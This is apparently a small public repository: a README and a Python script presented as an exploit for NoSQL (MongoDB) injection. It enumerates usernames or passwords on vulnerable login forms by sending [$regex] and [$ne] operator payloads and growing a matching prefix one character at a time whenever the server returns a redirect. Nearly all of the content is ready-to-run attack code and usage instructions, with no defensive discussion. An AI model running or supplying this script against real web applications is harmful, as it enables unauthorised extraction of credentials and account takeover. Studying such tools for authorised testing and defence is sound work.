[
  {
    "path": "README.md",
    "content": "# Nosql injection username and password enumeration script\nUsing this script, we can enumerate Usernames and passwords of Nosql(mongodb) injecion vulnerable web applications.\n<br /><br />\nExploit Title: Nosql injection username/password enumeration.<br />\nAuthor: Kalana Sankalpa (Anon LK).<br />\nWebsite: https://blogofkalana.wordpress.com/2019/11/14/nosql-injection-username-and-password-enumeration/<br />\n\n## How to run \n\n### Usage\n\n```\nnosqli-user-pass-enum.py [-h] [-u URL] [-up parameter] [-pp parameter] [-op parameters] [-ep parameter] [-sc character] [-m Method]\n```\n\n### Example\n\n```\npython nosqli-user-pass-enum.py -u http://example.com/index.php -up username -pp password -ep username -op login:login,submit:submit\n```\n\n### Arguments\n\n| Arguments        | Description           |\n| ------------- |:-------------:|\n| -h, --h      | show this help message and exit |\n| -u URL      | Form submission url. Eg: http://example.com/index.php      |\n| -up parameter | Parameter name of the username. Eg: username, user      |\n| -pp parameter | Parameter name of the password. Eg: password, pass      |\n| -op parameters | Other paramters with the values. Separate each parameter with a comma(,). <br />Eg: login:Login, submit:Submit      |\n| -ep parameter | Parameter that need to enumarate. Eg: username, password      |\n| -m Method | Method of the form. Eg: GET/POST      |\n\n![alt test](screenshots/usage.png)\n\n![alt test](screenshots/run.jpg)\n\n![alt test](screenshots/result.png)\n"
  },
  {
    "path": "nosqli-user-pass-enum.py",
    "content": "# Exploit Title: Nosql injection username/password enumeration\n# Author: Kalana Sankalpa (Anon LK)\n# Websites: https://www.widane.com, https://blogofkalana.wordpress.com\n# Blogpost: https://blogofkalana.wordpress.com/2019/11/14/nosql-injection-username-and-password-enumeration/\n\n#!/usr/bin/python\nimport string\nimport requests\nimport argparse\nimport sys\nfrom colorama import Fore\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-u\", action='store', metavar=\"URL\", help=\"Form submission url. Eg: http://example.com/index.php\")\nparser.add_argument(\"-up\", action='store', metavar=\"parameter\", help=\"Parameter name of the username. Eg: username, user\")\nparser.add_argument(\"-pp\", action='store', metavar=\"parameter\", help=\"Parameter name of the password. Eg: password, pass\")\nparser.add_argument(\"-op\", action='store', metavar=\"parameters\", help=\"Other paramters with the values. Separate each parameter with a comma(,). Eg: login:Login, submit:Submit\")\nparser.add_argument(\"-ep\", action='store', metavar=\"parameter\", help=\"Parameter that need to enumerate. Eg: username, password\")\nparser.add_argument(\"-m\", action='store', metavar=\"Method\", help=\"Method of the form. Eg: GET/POST\")\nargs = parser.parse_args()\n\nif len(sys.argv) == 1:\n\tprint(parser.print_help(sys.stderr))\n\tprint(Fore.YELLOW + \"\\nExample: python \" + sys.argv[0] + \" -u http://example.com/index.php -up username -pp password -ep username -op login:login,submit:submit -m POST\")\n\texit(0)\nif args.u:\n\turl = args.u\nelse:\n\tprint(Fore.RED + \"Error: please enter URL with -u. \")\n\texit(0)\n\nif args.up:\n\tuserpara = args.up\nelse:\n\tprint(Fore.RED + \"Error: please enter User Parameter with -up.\")\n\texit(0)\n\nif args.pp:\n\tpasspara = args.pp\nelse:\n\tprint(\"Error: Fore.RED + please enter Password Parameter with -pp.\")\n\texit(0)\n\nif args.ep:\n\tif args.ep == args.up:\n\t\tpara1 = userpara\n\t\tpara2 = passpara\n\telif args.ep == args.pp:\n\t\tpara1 = passpara\n\t\tpara2 = userpara\n\telse:\n\t\tprint(Fore.RED + \"Error: please enter the valid parameter that need to enumarate\")\n\t\texit(0)\nelse:\n\tprint(Fore.RED + \"Error: please enter the Parameter that need to enumerate with -ep.\")\n\texit(0)\n\nif args.op:\n\totherpara = \",\" + args.op\nelse:\n\totherpara = \"\"\n\nif args.m is None:\n\tprint(Fore.RED + \"Warning: No method given. Using POST as the method. (You can give the method with -m)\")\n\t\ndef method(url, para):\n\tif args.m:\n\t\tif args.m[0] == \"p\" or args.m[0] == \"P\":\n\t\t\treturn requests.post(url, data=para, allow_redirects=False)\n\t\telif args.m[0] == \"g\" or args.m[0] == \"G\":\n\t\t\treturn requests.get(url, params=para, allow_redirects=False)\n\t\telse:\n\t\t\tprint(Fore.RED + \"Error: Invalid method\")\n\t\t\texit(0)\n\telse:\n\t\treturn requests.post(url, data=para, allow_redirects=False)\n\ncharacters = string.printable\nfor ch in string.printable:\n\t\n\tif ch in \"$^&*|.+\\?\":\n\t\tcharacters = characters.replace(ch, '')\nloop = True\nfinalout = \"\"\ncount = 0\n\nfor firstChar in characters:\n\tpara = {para1 + '[$regex]' : \"^\" + firstChar + \".*\", para2 + '[$ne]' : '1' + otherpara}\n\tr = method(url, para)\n\tif r.status_code != 302:\n\t\t\tprint(Fore.MAGENTA + \"No pattern starts with '\" + firstChar + \"'\")\n\t\t\tcontinue;\n\n\tloop = True\n\tprint(Fore.GREEN + \"Pattern found that starts with '\" + firstChar + \"'\")\n\tuserpass = firstChar\n\twhile loop:\n\t\tloop = False\n\n\t\tfor char in characters:\n\t\t\tpayload = userpass + char\n\t\t\tpara = {para1 + '[$regex]' : \"^\" + payload + \".*\", para2 + '[$ne]' : '1' + otherpara}\n\t\t\tr = method(url, para)\n\t\n\t\t\tif r.status_code == 302:\n\t\t\t\tprint(Fore.YELLOW + \"Pattern found: \" + payload)\n\t\t\t\tuserpass = payload\n\t\t\t\tloop = True\n\n\tprint(Fore.GREEN + para1 + \" found: \"  + userpass)\n\tfinalout +=  userpass + \"\\n\"\n\tcount += 1;\n\nif finalout != \"\":\n\tprint(\"\\n\" + str(count) + \" \" + para1 + \"(s) found:\")\n\tprint(Fore.RED + finalout)\nelse:\n\tprint(Fore.RED + \"No \" + para1 + \" found\")\n\n\t\n\n"
  }
]